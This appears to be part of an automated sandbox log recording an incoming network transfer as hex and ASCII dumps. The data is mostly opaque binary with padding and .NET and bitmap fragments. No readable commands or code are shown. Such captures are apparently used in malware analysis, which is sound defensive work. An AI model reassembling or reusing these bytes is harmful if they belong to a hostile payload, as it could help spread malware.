2021-10-16 14:53:37 UTC	2277	IN	Data Raw: 7f fe 42 46 47 e7 93 c8 3b af 5f 8e f2 0b 73 85 cb a0 79 f4 d5 1d 87 48 86 5e 21 89 7f c1 ec 81 25 3c 25 f0 5b 14 9b cd d5 fd db 44 f4 a1 8d c8 52 2b c3 40 76 a0 42 c5 31 d6 5a 08 57 cd ce 47 ee 02 6e 91 20 d7 ae e1 62 04 28 9c 25 1d a4 7b 8d 0d db ce 4c ef 43 be b8 4b 39 18 db 81 de 5e 63 55 30 e1 40 ca f1 a8 ff 3f 86 f8 70 03 b5 b5 8b e9 b8 64 fc be f1 9e 76 c1 81 92 56 03 b7 7b 5f 77 64 2e 2d 13 a2 1b 6a 80 a0 98 fd 12 68 59 c9 03 09 87 6e 8b 88 6b 2c ad 63 1e 81 19 a4 52 48 35 71 b1 fc df d9 47 48 60 be 00 2b bf a8 f9 70 6b d4 04 3b 66 27 19 3d 20 d6 4d be d2 6d 26 12 d4 37 b8 1c 44 74 96 38 30 2d 11 dd b7 66 80 1a 8c 82 23 8d e2 e8 f5 e4 8a a1 52 93 d6 fa 20 92 53 10 61 69 f2 1c 94 47 3b e9 d4 2d 11 a9 24 9d ed 0e 94 80 88 16 a6 4e 03 d1 ad a6 11 1a Data Ascii: BFG;_syH^!%<%[DR+@vB1ZWGn b(%{LCK9^cU0@?pdvV{_wd.-jhYnk,cRH5qGH`+pk;f'= Mm&7Dt80-f#R SaiG;-$N
2021-10-16 14:53:37 UTC	2293	IN	Data Raw: 11 63 5e 17 9a 32 4a 6d e9 66 46 9c 11 e9 a6 01 49 72 b3 46 6f de f8 ff 5e d2 fa f3 18 61 4a 7d cb fe fc bf c6 56 0d b2 4e f6 12 0d 1f dd c8 36 64 65 86 b6 e9 2b 1c b6 b1 38 3d 2b db 3f 34 5a 92 4e 65 e4 43 1b 4d 68 fd 0f 11 7e e0 77 03 ec 37 90 d2 b5 ef a4 2e 83 25 d3 e2 e4 c5 b4 60 a3 13 34 7f 6e 8c ad 3f 58 40 38 f2 a0 4d 5b e8 dd 41 ea cd 47 0e 3a 41 ad 7f 25 ca a0 b7 56 92 22 f4 e7 51 74 33 57 8e b6 46 47 49 9c 89 3c f2 fd 37 60 f4 6f 53 10 46 6a 14 b5 e8 44 51 2e 54 fe 0f 36 9a db 9b 01 47 cd 67 ab fb 3d 18 f0 cd a3 4f ae ac 3d ee ac 93 82 bc c3 0d 17 13 5c f0 8a 20 9d 7d cb 17 33 1b 7e 69 8b 7f 45 d1 f4 bf 68 db b8 11 b0 0b a3 4c 4e da cb c4 59 17 dc 5a 38 d0 0a 4a a0 ff 5f b2 ab 20 af e6 96 45 8a b3 fb f4 aa b9 16 82 3b be 23 cb db 5e a5 8d 7f 62 Data Ascii: c^2JmfFIrFo^aJ}VN6de+8=+?4ZNeCMh~w7.%`4n?X@8M[AG:A%V"Qt3WFGI<7`oSFjDQ.T6Gg=O=\ }3~iEhLNYZ8J_ E;#^b
2021-10-16 14:53:37 UTC	2309	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 63 49 77 4b 31 1f a5 f2 02 fe 64 77 fa 8b 74 bf 4c eb 1c Data Ascii: cIwK1dwtL
2021-10-16 14:53:37 UTC	2325	IN	Data Raw: 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: DataBM6(,,
2021-10-16 14:53:37 UTC	2341	IN	Data Raw: ef a6 d7 19 98 99 ec 1c 13 f1 b4 74 73 95 16 61 19 da c3 d4 67 8b 73 81 20 a0 ae 81 0e b4 75 d9 23 d1 3b 3c a4 47 71 98 5d 13 0a de 7e 2c 8c ee 2b 14 e2 4a 3d 8a 69 e5 89 a3 20 b8 dc 3c 50 d8 3d 87 50 fc 43 f1 d0 db 26 17 e8 af 02 7b 3c 0e 6f 9f 5c 93 ab 00 e0 29 eb 2c 8c 49 7f 56 ea 1c a8 71 fe 5c 51 8a 78 cc 9a 84 e1 0d 9a 0b f5 aa 6f 56 aa 68 1b 54 15 03 da c6 a9 af 21 d4 a4 ec ed d6 da bd c5 a6 cf d0 10 45 3d ed e4 47 55 e6 18 0a 2e cf 8f 6c 1f 6c a3 42 97 3f 02 7c 95 ed f1 fa 09 93 e5 39 9a 73 39 9d d9 7d 40 5f 20 2b 5e 6c 11 01 32 e2 61 ec ca 74 d7 68 c9 4d ba 83 b8 94 e1 92 02 7e b7 60 d0 65 ad d6 c4 67 54 b8 b8 f5 8f 1e c7 ec a8 82 64 e9 f2 ad 2b 81 62 c6 eb a2 45 ee 15 aa 0a 88 5a 03 d7 3f f1 3b ed ef d9 a2 1d ac f8 b4 dd 2f b6 f6 d9 c3 0e 55 64 Data Ascii: tsags u#;<Gq]~,+J=i <P=PC&{<o\),IVq\QxoVhT!E=GU.llB?\|9s9}@_ +^l2athM~`egTd+bEZ?;/Ud
2021-10-16 14:53:37 UTC	2357	IN	Data Raw: cf e9 83 ca 01 45 d9 d2 e1 cf 2c df 87 84 5d 8e d3 76 e0 45 79 c7 f8 a5 ef 09 48 46 73 29 4e ad 39 39 19 fe f4 3d 19 d6 e7 dd 37 76 a5 da c6 e0 f9 f5 d5 91 21 ed 95 f3 c2 f4 4f 37 f3 9b 50 20 79 ea 15 6b f2 c4 f9 ed c6 9f 1b 1c af 05 e3 f9 c2 4b 09 9c 26 0b 61 cb e0 0f d9 b7 3b 31 d5 d3 f7 58 d8 3f 57 5a 09 8c 08 88 25 72 48 30 09 30 f3 6f a9 57 af 54 32 32 a2 b1 c0 ba d5 70 d5 37 f2 2b d5 56 e3 27 54 df 10 34 8b 6c 18 ba f0 1a 3c 1f ad 1e e4 2b e8 73 94 1c a5 f2 b2 77 a1 a5 4a 0f 89 36 cc ab 14 62 c8 80 8b 01 8d be 8c a3 78 b7 f6 be 1f 83 46 19 db 7b b7 17 4d ea 29 6d b3 db 49 24 68 c1 31 e9 12 fc 84 23 3f aa 9f 2f 96 ce a5 f8 bf 90 05 fe e5 7a fb 37 85 f1 45 e1 8d 35 52 db 9d f5 7f b2 77 c2 3d bc 6b 51 04 35 84 f2 56 34 50 bf 6b fe 5e ae da ad db 3a fa Data Ascii: E,]vEyHFs)N99=7v!O7P ykK&a;1X?WZ%rH00oWT22p7+V'T4l<+swJ6bxF{M)mI$h1#?/z7E5Rw=kQ5V4Pk^:
2021-10-16 14:53:37 UTC	2373	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2389	IN	Data Raw: e9 e1 bb 02 b0 ef 9e 68 1f 1b 2d 6a 5d fd 7f ac 72 09 fa c9 86 6e dd e2 ed a9 8f 57 70 85 55 db 52 de f1 c1 53 bd b3 fa 41 20 6f c8 03 b1 75 44 1a 4a 72 93 61 74 7b 8d f2 b6 dd 69 88 3c ae 57 ad ae 37 62 b5 c7 dd eb 81 6e 51 c3 5f fc ab ac 12 99 99 9a c9 f0 66 fe e2 cf 77 4d 8f cb d9 58 1e f5 a3 f0 20 7a 1a 9d cd a0 b6 e0 c4 5f 43 f9 67 e8 14 c2 47 07 a4 b8 11 55 88 b6 4c db b8 11 c4 59 4e e7 88 ec 41 85 01 8a a9 de c6 67 43 61 c8 08 b2 b5 c1 2f 30 2c ca 85 59 17 2a a9 59 48 88 cc 3e 92 65 e8 36 68 40 1c 1d fb c8 ac 8d 64 53 b6 9f 1e ee 71 b4 d9 e7 c5 c9 d3 2c 1e f4 95 6b aa 12 26 a8 49 73 96 d3 24 7e 55 8f 74 c2 89 fc 88 c8 ab f3 46 be 67 b7 6b 83 bd c6 4f b5 ae 35 d1 d9 ac c5 91 b5 da 12 56 36 da f5 c0 b2 52 10 f0 15 0e ee 28 c7 df fd 77 cc ce ad 47 23 Data Ascii: h-j]rnWpURSA ouDJrat{i<W7bnQ_fwMX z_CgGULYNAgCa/0,Y*YH>e6h@dSq,k&Is$~UtFgkO5V6R(wG#
2021-10-16 14:53:37 UTC	2405	IN	Data Raw: 82 67 bc 75 41 4f 69 6e 69 7b 0b a3 1b 63 e1 65 51 43 0f bc fc b3 5d 5d 49 01 4d da 74 66 53 89 33 8b 71 41 74 1f 03 78 45 9a 76 e5 94 4e 62 14 ba 09 32 1e bf a4 5b 1b 79 7e 60 dd 89 4e f6 a2 bd a2 26 df 12 de 1f a9 03 ac 3f 3b 98 75 4e 21 77 06 20 02 52 e1 94 f7 2f 08 79 31 da 8c 7c bf 4a d7 00 f2 51 58 34 2f 6e 2f c8 db f1 01 38 cd bc 83 b9 20 46 02 e1 8f 42 25 7d 81 eb c3 69 31 d0 4c 23 e5 7f 0d ab da e8 fe c9 e2 3f e4 24 9a c1 33 e2 b7 a0 44 cb 69 3f 5a 44 1e 8c 3a 5d 09 7c 9f e8 cb a0 1d a4 a6 c0 7b f8 cd 46 f8 05 54 ce d0 98 13 d4 78 cd 14 55 d1 06 9a ca 6c e3 53 d2 a4 66 c8 9e 5b 5d 59 c2 7d 75 85 30 c0 b7 db 7e 6f 6d 80 03 4c 3c 14 55 e4 4a 98 0b 6b 39 f0 a1 37 72 65 0b 8f f7 86 25 66 e5 c4 13 85 ed 8f 7b da 08 1f 7e cd 30 63 b9 f9 84 68 1c ae 69 Data Ascii: guAOini{ceQC]]IMtfS3qAtxEvNb2[y~`N&?;uN!w R/y1\|JQX4/n/8 FB%}i1L#?$3Di?ZD:]\|{FTxUlSf[]Y}u0~omL<UJk97re%f{~0chi
2021-10-16 14:53:37 UTC	2421	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 54 c8 23 c1 3e 30 d9 b0 9c d2 c9 f6 7a 40 ba 80 4f 96 05 25 9f 77 0f 9e 29 0a 3c 8e ef f5 81 6e 7a 1f da 91 5b 3c 54 91 5e 6e d6 e4 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ef cc f5 7d 42 f7 39 02 c0 c2 b7 79 3f 4f 67 8b 45 68 21 4f 81 5e 78 ad b7 62 98 c0 69 86 76 fa 8f 7c a5 1f 7c 41 99 d9 60 ff ad 78 02 ea 7f 10 3c 92 b0 a6 05 c6 0e 4d 99 61 e9 d2 23 7a e3 98 51 d9 f1 81 38 60 88 06 82 2d d0 44 0a 12 b2 af 35 72 1a 67 3a 97 69 a3 a5 4d e2 9d 41 bc 0c a8 78 2d b8 99 Data Ascii: 2T#>0z@O%w)<nz[<T^no}B9y?OgEh!O^xbiv\|\|A`x<Ma#zQ8`-D5rg:iMAx-
2021-10-16 14:53:37 UTC	2437	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2453	IN	Data Raw: 30 7a d3 91 97 5e 7e 67 39 07 5f d8 1d 4d 6e e1 4c ed d9 ba 66 57 1a 13 4d 3a 6a b9 ea ef 5b 5a 1f db 78 1e 9d 43 4e cb 17 c0 d4 b4 c0 3c 28 96 69 21 80 70 06 b6 1a ab 7b 3b 2e 2a 03 97 f0 0c 12 de 05 12 cc c6 7a c0 7a 15 08 07 76 9b d5 67 4d 15 a4 19 51 43 b6 61 6d 9c 83 f8 16 8c 5a 10 f3 8f af 56 c6 7a 96 50 c9 3e f9 9d d7 b4 1b aa 79 8d ba 67 61 1a 3e 36 1c 4b 03 5a e1 8d bd 3b ea ac 22 a9 a6 6f d8 36 49 d1 e7 ec 73 94 3b 70 cd fa cf 2f 92 6f 26 74 e7 72 42 49 2f a5 9c 48 ce 23 cb 9e 4b 00 97 28 81 81 2b 0e 8c c4 a0 e8 a3 b0 9e 17 d3 2d 5b f4 3d 97 82 6c 45 29 99 62 34 0d 87 7a 23 a8 61 92 27 34 10 73 d8 f1 ee b6 48 3d b8 d1 f8 63 d6 6c f8 80 08 71 b6 38 bc 6d 27 28 62 b9 63 b1 43 1b 33 4e d8 cd 7b 92 71 cb 1c 44 46 1b 1f 36 1b f9 6a 5e 33 9a 5c 66 a3 Data Ascii: 0z^~g9_MnLfWM:j[ZxCN<(i!p{;.*zzvgMQCamZVzP>yga>6KZ;"o6Is;p/o&trBI/H#K(+-[=lE)b4z#a'4sH=clq8m'(bcC3N{qDF6j^3\f
2021-10-16 14:53:37 UTC	2469	IN	Data Raw: fd 78 c5 13 56 79 ee 17 f9 1f d0 61 42 67 cc 2d 35 e6 ed 7c 79 35 b0 84 2f 51 4c 78 a4 37 05 22 7f 47 91 03 7c bc 2f 24 d3 24 e7 51 de 13 ce 5f 54 34 4f d7 3e 6d 8f fa e1 ba d6 32 12 61 18 80 cb 5b 93 19 7b 43 23 4b 38 4c ad ed 12 36 09 41 82 5d 98 0e 42 11 a6 98 ec 73 00 30 b1 b4 5d 23 42 1c 28 fe 47 87 d3 d6 eb 44 bd 1e e1 c0 60 05 92 9e 95 57 b0 89 1f 3a dd 7c 0c 89 6e 09 0e 1b 20 a5 a8 d2 f0 ff 32 29 da cc 74 19 ae 79 d5 2c 16 7c 66 f9 54 32 44 68 ad 07 3a e1 8f 6e 75 b6 e6 40 0a a9 f2 7f ee bf c6 97 9f c7 89 82 51 47 a3 ec 5d 16 35 b8 c1 2c 52 ef a1 5b 8e 13 47 4a 76 aa 64 f6 1d 43 a4 14 74 50 3d 55 02 05 d6 dc 46 02 f2 b4 24 c5 9e fb ab 4c a7 33 19 41 41 ae a6 05 28 ec 41 ee 66 6b 83 f8 b2 44 1d 74 54 81 e3 d8 22 8d 2a b1 6f bc 90 cb 90 47 18 da b0 Data Ascii: xVyaBg-5\|y5/QLx7"G\|/$$Q_T4O>m2a[{C#K8L6A]Bs0]#B(GD`W:\|n 2)ty,\|fT2Dh:nu@QG]5,R[GJvdCtP=UF$L3AA(AfkDtT"*oG
2021-10-16 14:53:37 UTC	2485	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2501	IN	Data Raw: 68 6c 6f 2d fe 43 9f 04 d9 17 e0 1b db 27 a1 5a 48 2e f0 79 c9 34 a4 90 0c a5 f1 48 01 4d 69 67 95 53 4f 1a 21 df 77 4b 0a f8 67 1f 79 87 8c 6f 85 cc 71 fd 09 cc 55 93 56 57 9b b9 e0 ea 6b 9f eb 6d 44 21 d5 fe 88 2d 9a d1 f6 d4 d9 ed eb 28 13 c7 14 b2 a9 8d 84 16 69 37 32 f6 6c 48 5b 80 f7 61 88 0a d3 b2 a9 b6 8c 9c 5b c6 d1 4d 52 fa 96 21 4f 79 ef 14 b6 16 ac 97 33 fb fa e5 9e 53 ee 25 5b 5f 29 fb 03 47 2f 0c 87 16 03 93 8f a5 bf f8 74 c4 5d c4 e9 ea d5 b9 eb f2 8e 0f 7a fd 74 83 66 4e 4b 91 f7 06 7d 20 00 a2 b1 ff 50 81 2c 28 c0 05 39 da 74 3c 77 e3 85 1b 93 28 15 77 04 25 26 f7 aa 3f 73 1f 33 d5 51 79 bd 0c cb 53 be 65 ec 3c 33 30 03 01 52 57 03 39 df aa 2f 14 66 b5 95 e2 c4 cd d7 9b d3 b0 ba 10 c1 f7 df 15 3d 95 9c 70 d7 a3 a8 74 38 e2 7a d1 b3 77 11 Data Ascii: hlo-C'ZH.y4HMigSO!wKgyoqUVWkmD!-(i72lH[a[MR!Oy3S%[_)G/t]ztfNK} P,(9t<w(w%&?s3QySe<30RW9/f=pt8zw
2021-10-16 14:53:37 UTC	2517	IN	Data Raw: 5f 9f 3e 07 7f 49 4d ca 44 a9 27 c8 90 fe 34 a4 64 88 61 3b d7 91 2a 1a 3e a9 c6 1a d1 77 07 a3 89 fc 0f 4e 80 d6 e5 33 a2 15 79 7a 23 0f a3 33 2a 87 a2 ef 05 76 2a 06 8a 72 3d d4 09 5b cc 66 61 27 99 29 3d 1a cf 28 58 4e bf 9a 3f 1f c7 bc 17 60 a9 f3 bd 75 7a ac e0 aa c3 f5 ce 3f ae 3f d7 ff 6a 78 27 d3 13 73 b8 ec e6 9e 96 ae 00 44 5d e1 57 e6 4e 03 ba 20 23 03 7e 74 a5 a2 ea ec f5 92 2a 5c ca e6 01 1d 66 1e c8 16 c6 9c 4c 8d 67 23 63 00 b1 41 e5 ca 79 5e 0d f7 49 e4 c6 4a 7b 50 ca b5 f3 6e 71 07 8a 71 0e 45 7e fc 72 26 00 d4 62 86 96 32 18 42 f3 e6 c0 93 dc 22 19 57 f9 0f 97 af 8f 1c 73 70 39 70 4d e0 e5 0e 29 4a 44 fd 47 74 d4 fd d8 e8 7f a7 49 23 5f 89 2c a2 b3 c5 d9 4f 10 3b 69 3b 1b ce 07 34 80 28 37 25 03 9d 8b f9 3e b0 1c b3 bc 21 f8 c8 ae 33 f6 Data Ascii: _>IMD'4da;>wN3yz#3vr=[fa')=(XN?`uz??jx'sD]WN #~t\fLg#cAy^IJ{PnqqE~r&b2B"Wsp9pM)JDGtI#_,O;i;4(7%>!3
2021-10-16 14:53:37 UTC	2533	IN	Data Raw: 34 af ca e8 15 c8 9b 28 04 c3 fa 84 a6 71 f2 07 73 d3 86 6c be 88 62 94 e7 10 07 e0 60 29 55 8c c0 35 0f 7c 8b c3 dc 1e 24 a1 ad f4 a7 03 ec cd 7e ed 4c 14 b5 f1 f7 0c 53 95 18 69 85 88 75 57 ee 78 88 b5 a2 a4 58 45 05 1b 67 5e 06 9d c4 b3 20 b5 3c d1 04 3a ff 08 dc c6 50 f4 24 04 bf cc b1 62 d4 a8 4f 78 91 16 60 b7 c4 bb b7 c2 47 ac ea 78 e2 94 55 8a 03 df d4 12 ec 07 16 42 ee 94 67 1c 3d ea 5a fc e5 c3 47 6a 5e 27 3a 24 be 97 03 b2 e0 d8 40 6d 2f 4b 77 2e 90 7a 0e bf fa db c3 65 f1 92 16 c9 d7 d5 d1 7f 40 5c 44 aa b2 66 1f 12 38 82 ca b3 39 e1 8b 1a 01 b2 f0 06 51 85 99 e1 87 93 43 12 9e 80 8e be a3 07 5c 90 ac 9c c5 00 19 b7 7a 90 6d 29 7e 71 cc 90 da be e5 56 99 03 df 90 69 18 af 90 51 f8 11 17 d3 a5 8a 96 e9 d7 bd 79 ee 03 48 f4 d4 e1 fa 04 36 e6 ad Data Ascii: 4(qslb`)U5\|$~LSiuWxXEg^ <:P$bOx`GxUBg=ZGj^':$@m/Kw.ze@\Df89QC\zm)~qViQyH6
2021-10-16 14:53:37 UTC	2549	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2565	IN	Data Raw: e0 52 60 d8 aa 7f 68 1a 36 94 71 0e 0c f1 ca ec 6a 5e d3 d6 30 71 98 62 70 36 60 dc ad 22 a5 09 13 8e 9c e0 50 85 e0 67 7c a1 f8 11 ff 1d 50 05 cd d0 c5 04 f2 1c 09 b6 a0 62 7a 5d 97 06 76 24 ba 1b 5c 27 f1 50 05 9e 15 d4 47 2a a9 a0 43 61 90 fb b9 b5 7f 74 62 27 cf d3 41 08 90 20 dd 27 de aa 94 e9 3f 23 1d 42 69 9f 6c 5e 7c 61 d6 48 69 be 27 3d 87 b9 4e 8a ef 9b 83 6a 40 df 7d dd 6d 27 02 b0 25 ba 0f e2 0c 99 4a d7 73 18 c4 7f c8 3b 6b 45 98 5c c7 d6 98 c2 a6 47 4e 97 58 bc e9 fe 6e a1 8c a9 f2 8b 61 d8 d8 20 46 1b 67 7f 02 08 87 e0 b3 93 d3 c8 53 f1 0a c0 80 33 7e 4b 9f 8a 48 2b 35 1e 90 19 9d cf 88 8a 00 a5 95 c3 27 e0 57 2f af 67 a6 dd da 3c 18 37 2a fd 95 d0 ab ad 78 6d 8f a0 a2 42 de 59 1b 89 01 dc ad de 18 45 11 49 27 c8 99 b3 57 8d 89 26 4d 63 da Data Ascii: R`h6qj^0qbp6`"Pg\|Pbz]v$\'PGCatb'A '?#Bil^\|aHi'=Nj@}m'%Js;kE\GNXna FgS3~KH+5'W/g<7xmBYEI'W&Mc
2021-10-16 14:53:37 UTC	2581	IN	Data Raw: 72 c7 1d 43 07 7f 75 07 1e 85 79 a6 61 dd 9b 4f 41 78 ec 8e a2 62 36 65 43 3c b4 ed f6 bc 1c 8c b9 a9 f4 97 fb 2d bf 6a 78 15 46 e6 a6 00 9e 67 95 c4 a5 63 3b 10 6f d4 34 9a 69 2e a4 fe 1a 6b 24 2e eb ac c3 12 4d f4 c7 c4 11 71 23 1b d5 99 7a af 76 ea 5b eb 20 29 06 83 d1 66 e0 3d c1 fc 9c 70 18 83 ff 12 e9 18 39 9e 5a 3e d4 a3 fd 5e 87 2e 08 26 fb dc 3c 4c 65 82 6f 1b 8f 05 81 40 ba f7 b9 32 58 1c bc 69 e4 62 cd c9 e7 8b 53 83 5c 6f 89 65 1b 0e bb 66 4b 62 8a 67 30 de 0a 52 56 e2 76 8e af 3c bc bf b2 ce 22 85 6a 87 08 7e e2 ad a3 67 e8 70 9b f8 ad c0 18 33 b4 5b 5e 1f 5b 35 fa 07 64 ef dd 05 91 d8 9e 19 f3 31 92 57 4b 41 e7 c3 e1 09 73 44 3b 70 9e c2 93 ca e5 61 7e 76 d2 eb 6d 8b bc 69 54 f4 0e c0 8c c4 20 63 1d fc a0 95 7e 42 fd c6 14 94 b0 fe b3 b1 bd Data Ascii: rCuyaOAxb6eC<-jxFgc;o4i.k$.Mq#zv[ )f=p9Z>^.&<Leo@2XibS\oefKbg0RVv<"j~gp3[^[5d1WKAsD;pa~vmiT c~B
2021-10-16 14:53:37 UTC	2597	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2613	IN	Data Raw: a5 c5 3d 3e 43 1d c7 5c 1a 5c 70 47 16 5e ea 26 37 17 a4 a1 2f 78 62 14 6c 10 8c f2 6e 8f f8 24 0a 62 aa ed a7 70 f3 f0 d7 b5 d9 0d 0f 00 00 00 00 7d fc 14 8b 23 48 30 9a be a5 15 80 fd f1 46 b8 36 c4 b8 93 24 ba ff f5 6d 22 17 cb 30 e2 4c 10 fc 54 72 dd 25 e7 5f 80 4b 38 13 62 9e 12 9a 2d ad d6 1d 15 41 ef 3b 13 60 a2 0b d5 5f c2 36 9b 1b d9 33 fb 2c d7 ae ae 1b e2 98 71 13 86 c9 d8 f7 6c c0 77 4c c6 0c c8 b0 e9 91 96 5c 36 aa f8 35 72 08 ec 14 d9 a1 fb 20 09 88 24 42 12 ac d7 8c 2b ab ea 9c 12 60 19 10 60 f5 f5 e7 79 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 Data Ascii: 